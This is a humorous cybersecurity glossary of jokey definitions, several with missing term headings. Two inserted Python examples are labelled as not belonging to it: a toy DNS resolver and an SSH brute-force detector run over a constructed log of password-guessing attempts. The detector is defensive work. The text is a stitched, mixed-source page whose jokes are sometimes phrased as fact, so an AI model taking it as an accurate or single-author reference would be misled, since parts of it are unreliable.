Wizernary - Translating Geek to English
Have you ever nodded your head to pretend to know what your Tech Team is talking about?
Now you don't have to! Introducing....
A fabulous collection of cyber security definitions with all of the wit, humor, and sarcasm of Wizer Warlock, Chris Roberts! So entertaining, you'll want to read them over and over!
Inspire us by sharing your own term!
2FA (Two factor authentication)
That code you get on your phone from the Internet
Access Control List
This is the border guard that’s standing between you and the other side of the network, file, object, or program that you want to interact with. If you’re on the list, then you’re in and if you’re not, then you’re likely to get the digital equivalent of a really bad headache as you’re sent off to NULL.
Passport control in the digital world
That end user license agreement you clicked “agree” to? You know the one you just clicked when you installed your computer, new program or shiny app on your phone? Yea, that one… that’s the very document that absolves the company you just gave your money to from ANY responsibilities or liabilities if it doesn’t hold up its end of the bargain. Get a virus, it’s your fault...program crashes, probably your fault...got ransomware? Yeah, your fault again. Rarely IF ever does anyone in our industry stand up and take responsibility when their product fails. Welcome to the anti-accountability of InfoSec/Cyber.
Something that’s sorely missing across our industry
Power corrupts, absolute power corrupts absolutely… it’s like having the master key to life, but in the digital realm.
When your phone or system lets you make whatever changes you want, irrespective of any consequences beyond simply asking “are you sure?”
No permission required…
Admin (istrative) Account
This is the account that comes with a cape, underpants on the outside, and can leap tall buildings on demand. It’s the account to rule all accounts and probably needs to be thrown into the nearest volcano because of the problems it causes when it’s enabled and left on for anyone to use OR “because we want OUR users to be able to do what they need to do…” This is the account that typically has unrestricted access to everything you have, own, or can touch. Use carefully AND keep caged when not in use!
Omnipotent Mode for folks who don’t know Linux
Your digital enemy, they’re out there, in the trenches, the forest, or the building next door, just watching for that opportune moment to take advantage of you, your family, team, company, or the supply chain you so perilously rely upon.
Someone who wants to steal from you or do harm to you
Advanced Persistent Threat
It’s like the digital version of WMDs. We’ll scream from the top of our lungs that we’re about to be brought to our knees with APTs coming in from (pick a country we don’t like in the moment) until someone gives us money OR allows us to go on the rampage… Then we find out we actually got breached because some numpty left the digital keys under the front door mat.
Really sneaky adversary who doesn’t set off the alarms
Adware
You know when you go to look at one website and all of a sudden things start appearing on your screen like mushrooms after a good rainfall? That’s adware at work. They are the unwanted pop-ups that appear all over your screen trying to entice you to click or subscribe OR pleading for you to just stay etc.
It’s a form of malware that’s really just unwanted or nuisance advertising. You can stop it with the correct settings on your device, and you can clean it up with the right software… Think of it as the digital version of mace, sometimes that’s what it takes to stop someone from pestering you
Unwanted digital billboards
For once, the name actually means what it does. It’s a program (or series of programs) that are designed to find viruses or other harmful programs on your systems (computer, web browser, phone, fridge, etc.) The modern ones are called “Endpoint Protection” and basically are evolved versions of this with more functionality and a whole lot of flashier lights…
Digital vaccine, but not always effective, kinda like the flu shot…
Arbitrary Code Execution
You know how someone takes over a conversation, or hijacks a point you’re just about to make? OR that person that won’t ever let you finish a sentence because they “always” know the answer? Welcome to the human version of arbitrary code execution. It’s simply when a computer allows someone else to run THEIR programs instead of (or as well as) yours… Basically, they’re taking the wind out of your sails and leaving you high and dry.
Sneaking in a program using unlocked side entrance….
Artificial Intelligence (AI)
Really smart computer, it can beat you at chess, but still can’t make good coffee.
Assessment
You know when the Doctor comes into the office with the KY jelly and gloves? That’s an assessment. It’s a way to understand risk, review what’s in place against what should or should not be there, and then to help you work out an effective remediation plan. In the digital world we occupy, that assessment can take in all sorts of controls that have been devised by the industry to try and reduce risk, raise awareness, and slow down the adversaries. It’s designed to highlight deficiencies in the human, the policies, procedures, controls, AND technology.
You and yours under the microscope…
Asset
In our world, an asset is any data, device, or component of the environment that houses or supports information related activities. It’s not a Jason Bourne thing where it leaps out of the cupboard at a moment’s notice and starts to attack you…although that MIGHT happen if your asset falls into the adversary’s hands. After all, what’s yours is MINE, and what’s mine remains mine…
It’s something tangible in EITHER the physical or digital realm
It’s the digital equivalent of you leaving your door open, your window ajar, or car unlocked. It’s simply another way to say how someone may attack or take advantage of you. It’s simply the method used to break into you.
How do I love thee? Let me count the ways… See, even Elizabeth Barrett Browning was doing assessments in the 1800’s.
Taking advantage of you
Audit (Log, Record, Tools, Trail)
This is the time that (unfortunately) many companies and individuals dread. It's the time when the folks arrive who are going to ask all the awkward questions that we've been avoiding, AND it's our job to distract and disarm them to a point that they leave with a good feeling AND have ticked the box that once again, we're all nice, cozy, and safe for a year. OR, at least that's what it HAS been up to this point, which is a large part of the reason we're failing so badly at this whole security thing. What we SHOULD be doing is welcoming the auditors with open arms, having them help us understand our weaknesses, AND build the necessary business risk and maturity cases to take to the business to better help them understand the reality of the situation. Idealistic? Probably, but given the tactic of hiding everything from them has so far failed, I'm up for a better and more accountable way to deal with auditing in all its facets.
The day of reckoning...
Authentication
This is simply the name for the process by which we work out "you are who you say you are." Whether you're at the ATM having to put your PIN in, sitting at a keyboard typing in a password, or looking at the phone while it decides if that moustache is real or false…they are all methods of authentication. It’s simply working out if you are true, genuine, and valid.
Remember trust AND verify… this is the verify part.
Availability
The typical way to look at this is simply “Can I get to it, is it accessible, can I see the website or the app and is it responding?”… that’s how any normal person views the subject. In engineering terms, it’s the degree to which something is in a specific state at the start of a specific period of time. In the digital world, it’s both of these measurements AND also the study of redundancy and what dependencies we have ON that specific service, site, or web page. Remembering the complex web of systems between you and that website often means measuring availability (or relying upon it) across many technologies and locations.
Refresh again, and again…is it there yet?!?
Backdoor
Remember snakes and ladders? A backdoor is like finding that one ladder on your first go that puts you right at 99… Typically, backdoors are disguised or hidden by their creator. More often than not, they used to be fun (Easter eggs where if you knew the keyboard sequence you could get the program to do something fun) BUT these days there’s always talk of putting backdoors into encryption. Problem is, a secret entrance is no longer a secret once more than one person knows about it.
It’s the not-so secret entrance…
Bitcoin
It’s an analog dollar in a digital world. Think about it… if I hand you $1, I can’t spend it again, but in the digital world I could copy that digital dollar as many times as I want, so we put that digital dollar in a ledger (so it balances) and we show that I gave YOU my electronic dollar, and we write it down and share it with everyone…so now everyone knows I gave you my digital $1. In the real world, I could just shout out to everyone around me that I gave you my money, but in the digital world it’s all recorded on all the systems that I did it… So, I can spend it once, and if I help WITH the system I can become part of the “mint” (I can even run my own digital printing press as long as I have enough computers) and I can tell that ledger that I’m doing it. Welcome to Bitcoin, a digital dollar in an analog world.
Digital dollars in a digital wallet
There are no hats. There’s certainly NO black hat is bad, white hat is good. Did we use it in the past? Yes. Do we have a conference named after it? Yes. Have many of us realized that it does nothing more than perpetuate a stereotype that is both wrong for our industry AND society as a whole? Yes. Are many of us active in trying to do away with this labeling of good vs. evil? Yes.
Will we succeed? We HAVE to.
Remember the old way of doing accounting? Two ledgers? It’s a digital version of that, but a whole lot more ledgers and a LOT more accountants, all working furiously to record transactions and make sure that they agree AND that nobody can mess with the books.
It’s a digital version of your check register that’s shared with ALL your friends and family.
Your computer. Really, it’s YOUR computer, or anyone’s system that’s infected with malicious code, that’s then used to attack and infect others.
A lot of computers being controlled by someone else other than their owners
Remember the Dutch story about the kid that saved the country from flooding? Yeah, it’s like that, but there’s no kid, the hole’s big enough to drive a bus through, and the water? That’s YOUR data leaving…
Someone you didn’t invite in just backed up ALL your data, snuck it out, and has it.
When someone breaks into your home, office or computer
When I don’t know the answer, I guess… and the system lets me keep guessing. Mostly used against passwords where I can “guess” up to a billion times a second using certain types of computer equipment.
Using a digital sledgehammer to crack the walnut
Bug
In computer terms (and not Mother Nature’s creepy crawlies) it’s a coding error, a flaw, or someone, somewhere forgot to put a ";" where it was needed… The program will often still work, but somewhere, something has taken notice and it’s eating memory (making your computer slow) or simply it’ll stop working (for those of you old enough, the Microsoft blue screen of death…)
It’s estimated that there’s 15-50 “bugs” per 1,000 lines of code, and most modern cars have 100 million lines of code in them… Think about that next time you are speeding on the motorway.
It’s a flaw, unless you are Apple or Microsoft in which case it’s an “enhancement”
Bring Your Own Device (BYOD)
What it really means is that the company doesn’t want to buy you a computer or phone and you can use your own OR they want to give you one from the stone age and yours is better.
Using your personal device to do work on…
Captcha
How DO we know what’s at the other end of a keyboard? Ask it a question? Get it to explain emotions? Tell it to solve a riddle? OR do we show it a picture of zebra crossings and traffic lights and ask it to select all the squares with squirrels? Do we show some abstract art cunningly disguised as numbers and letters? Welcome to captcha, one way to (hopefully) slow down the number of automated computer programs that flood our systems with spam emails and absolute rubbish… The idea is simply to work out if there’s a human or a machine at the other end of the keyboard.
Separating the humans from the microchips…
Nope, it’s not the spy agency that collects and disseminates foreign intelligence, neither is it a bunch of digital spies. It IS the acronym for Confidentiality, Integrity, and Availability, which is also known as the CIA triad (talk about adding confusion to things!) These are the three cornerstone principles that many organizations should aim to build their security functions around. The logic being that any system, data, objects or resources are protected from unauthorized viewing, that changes are correctly and reliably done, AND that the system and resources are usable whenever necessary.
A more caring and sharing version than our namesake…
CISO, CIO, CPO, DPO
Chief Information Security Officer, Chief Information Officer, Chief Privacy Officer and Data Protection Officer. Welcome to the senior leadership acronym soup for those that are typically empowered to manage, maintain, and effectively protect (as best as possible) YOUR data and the integrity of the systems it’s housed within.
All the chiefs...
Closed Source
We don’t know how it works, what it looks like, or whose hands were on the keyboard…we just have to trust that it works, carries on working, and doesn’t break (too often). This is the realm of closed source software or systems. Remember as a kid when you asked how something worked, and the adult answered, “it just does!”? That’s closed source in a nutshell. It’s the total opposite of open source, where the developers, companies and folks put their code and their inventions out there for everyone to look at, review, understand, use, and possibly improve or enhance.
You’re NOT allowed behind the green curtain…
Cloud Computing
The easy answer is “it’s someone else’s computer” BUT that's like comparing an AMC Pacer to a Bugatti Chiron… Technically true, but about as far from the reality of things as possible. Think of cloud computing as VERY specifically designed and built for one core purpose…the flexibility to allow the rest of us to move all our data, systems, and lives TO it with minimal fuss and hassle…
Next door's computer (you know I had to leave that one in…)
Shared computers and storage in large buildings all over the world
Cookies
It’s not edible, at least by you… your computer likes them, and websites LOVE feeding them TO your computer. Some of them are nice; the good ones just want to remember what you looked at, what your preferences are, and they help with customizing your experience ON the website. However, there’s a LOT of cookies out there that are NOT nice and are used by advertisers NOT associated with the website you are on. Typically, they are called 3rd party cookies and they will track you, your movement, and do their level best to profile you and work out how to sell you something or worse.
Think of them as a digital fingerprint of where you’ve been on the Internet, what you looked at, and what you did…
It’s a digital (software) tracking device.
This is the digital equivalent of someone coming into your shed, borrowing all your tools to run their gardening company…or coming into your kitchen, using your stove, and ingredients and then selling it…right under your nose AND you don’t even get a free sample.
It’s someone using your computer for their benefit (normally your web browser) so they get to crunch numbers with your processor and slurp up your electricity and likely all you see is a slow computer and keep wondering why your internet’s as slow as molasses.
SETI gone bad...
Cyber
This is one example of where marketing won over common sense. Cyber is simply the collective name that’s been associated with anything related to the Internet, computers, and the digital age. It’s a combination word taken by blending computer, networks, virtual reality, visions of the future, and whatever else they could find to make Information Technology sound cool and appealing.
We can go back to the Greek and take their word for pilot or steersman (nautical) as those who held the future, and we’ve also got the 1940s to blame with cybernetics, which was the study of control systems and the communications between people and machines. Ultimately though, Information Technology was too much of a mouthful, so cyber was resurrected, dusted off, and the marketing machine ate it up.
Technology… OR a box of microchips doing something fancy…
Cyber Security
The protection of computers, networks, systems, hardware, software, and all things related. To protect from theft, damage, or attack by others. To guard against disruption, misdirection, and to safeguard the data entrusted to us. That’s meant to be the heart of Cyber Security. Arguably, we have one job... to protect others. People before process and always before technology.
To ensure confidentiality, integrity, and availability of information and the very systems we all rely upon.
The digital guardians
Denial of Service (DoS)
Think of this as someone unplugging the Internet, or part of it… you can’t get to what you want, your web browser’s sulking, and Netflix is offline. IF you are experiencing a DoS then it means you’ve annoyed someone enough that they worked out how to unplug you or your computers from the Internet, either by attacking your network devices or computers. (office ones or on the Internet somewhere.)
Stopping you from using your digital world
We understand physical security. (locks on doors, windows, and boobytraps in the lawn…) This is the digital equivalent. Think of all the ways we work to try and protect you, your identity, computer, phone, files, and pictures in “our” world. It’s an all-encompassing term that is used to describe the entire process of digital protection.
The cover-all term for all things cyber, cyber, cyber…
Digital Transformation
The use of digital technology to supplement people and processes in solving problems. Taking something that was manual or human intensive and working out IF and HOW technology could help. The greater goal of digital transformation is cultural: breaking down borders and barriers by bringing everyone together to solve problems, share solutions and simply benefit humanity in all manner of unique ways.
By bringing a diverse cultural experience to a wider audience; in simple terms it would be a market trader in Uganda working out they could sell their goods online (Etsy, Amazon, etc.) All of a sudden they’ve got an audience of 4 billion as opposed to whoever’s passing by on the street. It’s got benefits (audience) and challenges (shipping, logistics, tracking, etc.)
Opening a business’s eyes to the digital world…
Distributed Denial of Service (DDoS)
Like the Denial of Service but typically done from a whole lot of different computers…think of this as the movie “300.” You’re guarding that passageway and a WHOLE LOT of digital Persians are throwing the entire digital version of the kitchen sink at you…eventually you’re going to fail…so go make a cuppa tea and start to go through your Incident Response Plan (see below)
Remember those times at a party or when you’re out enjoying yourself, there’s a crowd of noise and you’re trying to hear ONE person, OR when everyone’s talking to you at the same time and you’re trying to listen to ONE voice… that’s a distributed denial of service.
Think of this as the digital version of turning it up to 11…
Domain
An Englishman’s digital castle… Think of a domain as your piece of the digital world. You’ve decided to go onto the Internet and want to stake your claim (remind anyone of the Oregon Trail game… same idea, and as bad a consequence sometimes). A domain is yours (rented for however many years you pay) where you can put whatever you want in it or on it; congratulations, you can become the next Amazon, OR could fade away like Myspace…
It’s your own country in the digital world.
It’s that first part of that address you type into the browser… (Amazon, Yahoo, Facebook, etc.)
Domain Name Server (DNS)
Think of it as the contact list or address book for the Internet. However, unlike an address book this one’s distributed, and the first place you ask doesn’t always know where to send you…so it goes and asks someone else for the address (root server) that then often goes and asks another server (top level domain server) for where it’s hiding the location… anyway, long story short, your request CAN bounce around while the right owner OF the right address is found. Once that’s discovered your computer’s told where to go, and off you wander. The upside OF this whole system is that you don’t have to remember an almost infinite number of IP addresses (digital version of a phone number) NEITHER do you have to wait for Elizabeth to come into work and tell you the address (for those of us that remember the REALLY old days!)
The internet's phonebook...
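The bouncing-around described above, as an added example that is not part of the Wizernary: a toy recursive resolver walking root, then top level domain server, then the zone’s own nameserver, and caching the answer so the second lookup skips every hop. The delegation tables, names and addresses are constructed (RFC 2606 names, RFC 5737 addresses), not real DNS data.

```python
# Constructed toy delegation tables standing in for the real root, TLD and
# authoritative servers (RFC 2606 names, RFC 5737 addresses; not real DNS data).
ROOT_HINTS = {"com.": "tld-com", "org.": "tld-org"}
TLD_SERVERS = {
    "tld-com": {"example.com.": "ns.example.com."},
    "tld-org": {"example.org.": "ns.example.org."},
}
AUTHORITATIVE = {
    "ns.example.com.": {"www.example.com.": "192.0.2.10", "mail.example.com.": "192.0.2.25"},
    "ns.example.org.": {"www.example.org.": "198.51.100.5"},
}


class Resolver:
    """A recursive resolver walking root -> TLD -> authoritative, with an answer cache."""

    def __init__(self):
        self.cache = {}

    @staticmethod
    def _fqdn(name: str) -> str:
        # Normalise "WWW.Example.com" and "www.example.com." to the same key.
        return name.strip().rstrip(".").lower() + "."

    def resolve(self, name: str):
        """Return (ip_or_None, trace); trace lists every hop the lookup took."""
        fqdn = self._fqdn(name)
        trace = []
        if fqdn in self.cache:
            trace.append(f"cache hit: {fqdn} -> {self.cache[fqdn]}")
            return self.cache[fqdn], trace

        labels = fqdn.rstrip(".").split(".")
        if len(labels) < 2:
            trace.append(f"{fqdn}: not a resolvable host name")
            return None, trace
        tld = labels[-1] + "."
        zone = ".".join(labels[-2:]) + "."

        # Hop 1: the root only knows who serves each top level domain.
        trace.append(f"root: who serves {tld}?")
        tld_server = ROOT_HINTS.get(tld)
        if tld_server is None:
            trace.append(f"root: no such TLD {tld}")
            return None, trace

        # Hop 2: the TLD server only knows which nameserver holds each zone.
        trace.append(f"{tld_server}: who serves {zone}?")
        ns = TLD_SERVERS[tld_server].get(zone)
        if ns is None:
            trace.append(f"{tld_server}: {zone} is not delegated (NXDOMAIN)")
            return None, trace

        # Hop 3: the zone's own nameserver finally has the address record.
        trace.append(f"{ns}: address of {fqdn}?")
        ip = AUTHORITATIVE[ns].get(fqdn)
        if ip is None:
            trace.append(f"{ns}: no record for {fqdn} (NXDOMAIN)")
            return None, trace
        self.cache[fqdn] = ip
        trace.append(f"{ns}: {fqdn} -> {ip} (cached)")
        return ip, trace


if __name__ == "__main__":
    r = Resolver()
    for query in ("www.example.com", "WWW.example.com.", "nope.example.com"):
        ip, trace = r.resolve(query)
        print(query, "->", ip)
        for hop in trace:
            print("   ", hop)
```

A real resolver also caches the referrals it learns on the way (which server holds example.com), so later lookups in the same zone skip the root and TLD hops, and it caches negative answers too.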
Think of this as the digital version of the WWI and WW2 Windtalkers (or code talkers) that were engaged by the US Military. Originally, the Cherokee and Choctaw peoples helped in the First World War, then the Navajo in the Second. The logic being that only the sender and recipient can understand the message, and to everyone else it’s simply noise.
Turning perfectly usable data into mumbo jumbo since 1900BC, or around 1990 if we are talking the modern digital equivalent.
It’s the digital version of invisible ink.
Endpoint
For once, the word describes the digital world. Endpoint is literally that. It’s the end “thing” on the dangly bit of the network. Your computer, laptop, phone, tablet, fridge, and Alexa are all endpoints (even if the dangly piece of the network is wireless). It is simply the termination of that particular branch of a network. Think of it as the bus depot or train stop where the track or road dead-ends. It is also the latest buzzword that is meant to conjure up the new battlefield of our digital age, which is why SO many companies are trying to sell you agents (little pieces of code) to sit on your endpoint so they can be monitored in the hopes of catching more adversaries. IF only we all knew WHERE all of our endpoints were…
Anything that’s got a beating digital heart on your network
Enterprise
Typically, enterprises are for-profit businesses and, depending upon how the word is used, it can describe scale, ownership structure, or many other elements relating to business classification.
It’s also an undertaking, typically a complex, bold, and all-encompassing one that is likely to swallow up ½ the company and cost 3x the original estimate… Welcome to the world of ERP (Enterprise Resource Planning) projects and all the scary things that come with them…
To boldly go where no business has gone before
Event
Often in the digital world, we talk of events in reference to log monitoring, management, and collection systems. It’s a “thing” that happens often (especially if we’re referencing it among millions of things), one of importance. In basic computing, we keep logs of events on various systems. These are often then copied elsewhere (to a log management system) where they’re compared, referenced, and someone, somewhere decides if that event is important OR if it can be filed away with the rest of the data. Certain events we focus on are incorrect passwords being tried, or someone rattling the digital doors and windows of our world etc.
A digital diary of what’s happened
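The “incorrect passwords being tried” event, and the brute force entry’s point that the problem is a system that lets someone keep guessing, as an added example that is not part of the Wizernary: detection logic run over a constructed sample of OpenSSH-style log lines (RFC 5737 documentation addresses, not real traffic), flagging a source that piles up failures inside a short window and escalating if that same source then gets in.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in OpenSSH's log format with RFC 5737 documentation addresses
# (not real traffic). One source hammers the host and finally gets in; another
# just mistypes a password twice, minutes apart, then logs in with a key.
SAMPLE_LOG = """\
2024-03-01T10:00:01 sshd[2101]: Failed password for invalid user admin from 203.0.113.7 port 51022 ssh2
2024-03-01T10:00:03 sshd[2102]: Failed password for root from 203.0.113.7 port 51024 ssh2
2024-03-01T10:00:05 sshd[2103]: Failed password for root from 203.0.113.7 port 51026 ssh2
2024-03-01T10:00:08 sshd[2104]: Failed password for invalid user oracle from 203.0.113.7 port 51030 ssh2
2024-03-01T10:00:12 sshd[2105]: Failed password for root from 203.0.113.7 port 51033 ssh2
2024-03-01T10:00:15 sshd[2106]: Connection closed by 198.51.100.20 port 40210 [preauth]
2024-03-01T10:00:40 sshd[2107]: Failed password for root from 203.0.113.7 port 51040 ssh2
2024-03-01T10:00:45 sshd[2108]: Accepted password for root from 203.0.113.7 port 51042 ssh2
2024-03-01T10:01:00 sshd[2109]: Failed password for alice from 198.51.100.20 port 40212 ssh2
2024-03-01T10:05:00 sshd[2110]: Failed password for alice from 198.51.100.20 port 40220 ssh2
2024-03-01T10:05:07 sshd[2111]: Accepted publickey for alice from 198.51.100.20 port 40221 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+"
)


def parse_auth_lines(lines):
    """Yield (timestamp, result, user, source) for password-auth lines; ignore the rest."""
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            yield datetime.fromisoformat(m["ts"]), m["result"], m["user"], m["src"]


def detect_brute_force(lines, threshold=5, window=timedelta(minutes=2)):
    """Per source, keep only the failures inside a sliding `window`; raise an alert when
    `threshold` of them pile up, and escalate it if that source then logs in."""
    recent = defaultdict(list)   # src -> failure timestamps still inside the window
    total = defaultdict(int)     # src -> every failure seen from that source
    users = defaultdict(set)     # src -> account names it tried
    alerts = {}
    for ts, result, user, src in parse_auth_lines(lines):
        if result == "Failed":
            total[src] += 1
            users[src].add(user)
            recent[src] = [t for t in recent[src] if ts - t <= window] + [ts]
            if src in alerts:
                alerts[src]["failures"] = total[src]
                alerts[src]["users"] = sorted(users[src])
            elif len(recent[src]) >= threshold:
                alerts[src] = {"failures": total[src], "triggered_at": ts,
                               "users": sorted(users[src]), "success_as": None}
        elif result == "Accepted" and src in alerts:
            # A burst of guesses followed by a login is the one to look at first.
            alerts[src]["success_as"] = user
    return alerts


if __name__ == "__main__":
    for src, alert in detect_brute_force(SAMPLE_LOG.splitlines()).items():
        print(src, alert)
```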
In the real world, we’d think of this as stealing or shoplifting. The attempt by someone to remove something that doesn’t belong to them from a location (store, house, car, etc.) in the digital world is the same thing except replace that item with data. It’s the unauthorized attempt to remove data (data transfer) from where YOU last left it TO a location that they want to take it.
All your data no longer belongs to you...
In the physical world, it’s the crowbar that was used on Pandora’s box, or the same one used to get into your house, shed, or car. It’s simply the act of taking advantage of a vulnerability OR causing a situation where a vulnerability opens up…
To take advantage of you
Failover
If you think of this as a relay race, the 4x100 or 4x400, there’s 4 folks, each of which is probably capable of running the whole distance IF they paced themselves BUT they have to go flat out for ¼ of the entire distance and by the time they get to handover the baton, their muscles are probably screaming and demanding a rest…at which point the next person takes the baton and carries the load for their allotted distance. IF it goes well, the handovers are smooth, seamless, and appear to be fluid without interruption to all gazing in. IF it doesn’t go smoothly, then 4 years of training and the hunt for gold disappears in a tangled heap of arms, legs, and frustration. In the digital world, it’s the same. A smooth failover will rarely be noticed, yet a messy one can mean outages, data corruption, and a lot of frustrated folks.
Seamless load shifting between resources
Firewall
It’s meant to be a barrier between you and the rest of the Internet when you are sitting at home or in your office; it’s meant to protect you from some of the bad stuff out ON the Internet (or the office next door) but in practice it’s as leaky as an old sieve and as much use as a chocolate fireguard. The problem is, it can’t BE a barrier because it has to let SOME traffic through (the stuff you WANT to see) but in opening that door it’s not very good at stopping uninvited guests from sneaking in too. It tries to ask everyone for their invites, or to ask them why they want to come in, but the attackers are sneaky and will lie to your firewall, and unfortunately, most of the time, it believes the lies.
It’s like Jeeves at home, it’s great at being nice to the right guests who come to the front door, and it can sometimes catch the ruffians trying to sneak in, but it’s fairly useless at watching the windows, the back door, and heavens forbid someone sneaks in through the coal chute… You can’t pension Jeeves off, but you can’t rely upon him to REALLY guard the place.
The digital butler, great if you abide by the rules, totally flummoxed otherwise.
Federal Information Processing Standards (FIPS)
Welcome to a set of standards that are meant to make sure that we all communicate, collaborate, and cooperate in a cohesive and defined manner. Remember that scene in Independence Day when Will Smith and Jeff Goldblum save the day by injecting the alien mother ship with a virus uploaded from a MAC? We all wondered WHY that worked and the truth is ALL down to FIPS. Apparently, we’ve been using the same common standards as they have for system interconnectivity and programming languages. See! Told you the Government’s been holding out on us… FIPS covers many different areas within the government and folks working with and for them, and thanks TO the standards some of the basics are covered and we don’t have to keep guessing or asking for the standards, etc.
Well-meaning standards IF only they could write them in English…
Firmware
It’s the programs that make the hardware work. When you mash a key on the keyboard OR you yell at Alexa OR print something, there’s a layer between what you’ve done and the app or computer software that shows you the results. That’s the firmware. The keyboard tells the firmware what was pressed, that then tells another piece of software in the operating system (Windows, Linux, Mac, iOS, Android) what you did, and then lo and behold it appears on the screen in the right place… Same for Alexa: the sound hits the microphone, which translates waves into 1’s and 0’s, the firmware tells the software what it heard and the rest happens…it’s the layer that makes things work.
It’s THE doorway between human interaction and digital reaction.
To harshly insult you using the Internet as the delivery method. More often than not, it’s done anonymously. (one of the worst aspects OF the Internet is the ease in which people can hide…)
The digital equivalent of “Your mother was a hamster, and your father smelt of elderberries!”
Ghosting
As in the physical world, so be it in the digital one… In the human world, ghosting means to abruptly end a relationship by burning the cards, throwing away the phone, and deleting the email account… In the digital realm, it’s when that’s done TO you… All of a sudden you don’t exist, your cards don’t work, you have no credit, and apparently your social security/national insurance number was given to a squirrel that’s now stuffed on the mantelpiece of your adversary. You have become a non-entity; congratulations, now you can join the CIA. ;-)
You’ve been erased, wiped out, digitally you are no more.
A living, breathing yellow pages...
A digital portal to the world. Be careful what you ask for...
Governance, Risk, and Compliance (GRC)
As the name implies, the aim of GRC is to help manage an organization's overall governance, enterprise risk management, and compliance with identified/required regulations. It’s a framework or a structure that helps to align IT and the business while managing risks AND meeting compliance. It’s a mouthful, isn’t it? The logic is, when an organization wants to understand its risk (how often is InfoSec now being asked to do risk assessments, NOT penetration tests, etc.) it can identify what those risks are, translate them to the business, and then clearly align the teams to focus on measurable tasks. At the end of the day, GRC is meant to make sure that we’re all rowing in the same direction FOR the same reasons.
Bridge building between technology and the business
Hacker
That’d be me, us, a community, and a LOT of folks who are day-walkers OR who don’t necessarily prance round in hoodies ALL the time. We’re the good folks, and according to Hollywood, we can stop ships, take control of power stations, AND hack aliens using an Apple Mac. Apparently, the media and the marketing folks in our industry didn’t get those particular memos.
We’re the tinkerers, wizards, witches and warlocks of the digital age…
Community Submission from Douglas Bodden:
Hacking is the fine art of finding leverage where no one thinks a fulcrum can be placed.
The physical elements of the computer, system, device, or blinky lights that you’ve purchased… Those things WITH form that occupy space, gathering dust bunnies, or cluttering up the cupboard. (Once they’ve been superseded (Betamax player anyone?))
The things you can touch, the keyboard, screen processor, hard drive, mouse, etc.
The part of the computer you CAN throw across the room when it reboots unexpectedly…
Hash
It’s the mathematical formula or function that takes whatever you’d typed on the keyboard or pointed it at and scrambles the heck out of it so that it looks like it makes no sense to anyone apart from the computer itself (or whatever program or reason it got hashed for in the first place.) The value is unique to the original text, file, picture, OR entire hard drive, so if you change something and run that hash function again… you’ll get a different output. We use the function (or formula) for a whole bunch of things from encryption to forensics and indexing. (think Google etc.)
Converts one thing into another, often leaving the output “looking” strange BUT really useful.
Health Insurance Portability and Accountability Act (HIPAA)
HIPAA is a federal law that’s meant to protect sensitive patient information from being disclosed without their consent or knowledge. It tries to cover the areas of physical and digital security as well as administrative best practices. It’s meant to cover anyone that has OR would come into contact with any of your data, from the Dr. you see, the hospital, dentist or other locations AND all the people, companies, and 3rd parties that interact with them.
If HIPAA was taken in the spirit of what it embodies, it would be effective and do a fantastic job of protecting the patient and all their data. However, that’s not always the case, which is why we still see so many breaches in healthcare.
Healthcare’s Golden Rule
Think of putting that pot of honey out for Pooh and watching how the pot gets examined, how our intrepid little bear dips a hand in and swirls it around. Maybe it was placed there so Pooh spends all the time looking at the obvious pot and not the hidden stash or maybe it was discovered there (or placed?) so someone can observe exactly how the bear plays with and eats the honey so you know how, who, and why to block or defend your larger stash of the sticky bee byproduct.
It’s a TRAP! has never been truer…
A digital signal that moves between various devices on the network to demonstrate they are alive, active, and working. It can also be used as a way of synchronizing systems OR as one of the first steps in ascertaining whether the environment needs to fail over to another node or location. (No heartbeat, no life… As with humans, so with the digital world.)
Proof of life
Human Machine Interface (HMI)
It’s the way we interact with machines. At the moment, we’re in the early stages of hooking the brain up to the computer, so for now we have to rely upon an interface that we can interact with. A screen like the touchscreens we have on our phones, tablets, OR the ones we use in ICS/SCADA systems are good examples of HMIs. Arguably, a keyboard, mouse, stylus, or other device where we take our analog self and apply instructions to a digital system would be considered an HMI; however, more often than not in the real world, most HMIs are found in harsher environments or those with limited space where a single interface is preferable.
Our analog connection TO the digital world.
Identity and Access Management (IAM)
IAM is a collective term that covers the framework of establishing who you are in the physical world and then securely using that in the digital one. It’s the collision of processes, policies, and products to effectively manage users, their identities, and their access permissions across an organization (or application). We often talk about knowing WHOSE hands are on the keyboard, as well as what access they need to have to certain things, as being one of the most difficult challenges within our industry. Now extrapolate that across traditional networks, shadow networks, cloud environments, home systems (thanks to the 2020 mess…), as well as everything in between. You quickly see where a simple ID and password won’t suffice as a solution for access. We can also see that this is not solely a technical solution. We have to have policies, procedures, and controls in place for the humans themselves, as well as knowing what they need to have access to (and when/why/for how long etc.). It’s a technical and logistical nightmare if you don’t have a good framework in place.
Proving you are who you say you are in the digital world.
Why be you when you can be new? OR why be you when you can be someone else? Identity theft is simply the act of becoming someone else for the sake of financial gain, enforcement avoidance, or something else where being “you” is detrimental to the situation. In the real world as kids, some of us would forge our parent/guardian’s signature on the homework record. In the digital world, it would simply be the act of becoming the parent…
In the digital world, we truly can be anyone we want to be…
It can be almost anything that has the potential to cause harm to something under your control, management, or care. Did someone click that email link without thinking or asking first? Did someone enable macros? Did another person fall for the “click to download free antivirus”? Who put their corporate user ID and password into that website that magically showed up? Did you just authorize an escrow payment because the “boss” told you to do it over the phone? You get the idea… There’s 1,001 different ways TO have an incident; sometimes they’re not too serious, other times you get a red screen, a ransom note on your computer, and the world feels like it is burning around you.
That moment when “whoops” isn’t enough OR you NEED the world to swallow you up…
Incident Response Plan
When all hell is breaking around you and you’re sitting there in the middle of things as calm and as cool as a cucumber. It’s because YOU have a plan. You know what to do, where to be... and as soon as you can get everyone’s attention, you’ll start to bring order to chaos. Think of the IR plan as a series of instructions on what to do just before the end of the world.
It’s our version of those flight safety cards, instead of telling you to put your head between your legs and kiss your ass goodbye, we simply want you to unplug the computers, grab the office dog, and exit safely.
A set of instructions for when all hell breaks loose
Industrial Control Systems (ICS)
A general term that encompasses large and small industrial systems including monitoring of machines or processes and changing portions of the machines or processes. Think of them as the digital monitors that watch the oil flow, or the well work, or the wheels turn on the critical systems that keep US warm, watered, fed, and sheltered. Unfortunately, many of the systems were not designed with security in mind, heck they were designed to work independently for decades and never be connected to anything…then WE came along, found the loose end of the network, and plugged it all into the Internet… and we wonder why there’s SO many issues!
